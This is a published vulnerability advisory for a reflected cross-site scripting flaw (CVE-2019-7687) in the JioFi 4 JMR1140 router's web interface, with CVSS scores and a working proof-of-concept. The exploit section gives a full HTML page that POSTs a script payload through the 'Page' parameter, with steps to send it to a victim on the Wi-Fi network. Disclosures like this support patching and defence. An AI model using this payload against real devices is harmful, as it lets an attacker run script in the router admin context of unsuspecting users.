Jiofi 4 (JMR 1140) Cross Site Scripting

2019.02.14
Credit: Ronnie T Baby
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: Jiofi 4 (JMR 1140) Reflected Cross Site Scripting # Date: 12.02.2019 # Exploit Author: Ronnie T Baby # Contact:https://www.linkedin.com/in/ronnietbaby # Vendor Homepage: www.jio.com # Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574 # Category: Hardware (Wifi Router) # Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07 # Tested on: Ubuntu 18.04 # CVE: CVE-2019-7687 Description: cgi-bin/qcmap_web_cgi on JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices has POST based reflected XSS via the Page parameter. No sanitization is performed for user input data. 1. Create a poc.html and insert <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST"> <input type="hidden" name="Page" value="GetDeviceDetailsyfc7b<script>alert&#40;document.domain&#41;<&#47;script>pyk0j" /> <input type="hidden" name="mask" value="0" /> <input type="hidden" name="token" value="0" /> <input type="submit" value="Submit request" /> </form> </body>d </html> 2. Send to victim(who is connected to the wifi network). 3. Post based Xss gets fired . Exploit working in firefox quantum ,firefox dev edition etc. Chrome XSS auditor blocks this POC.


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top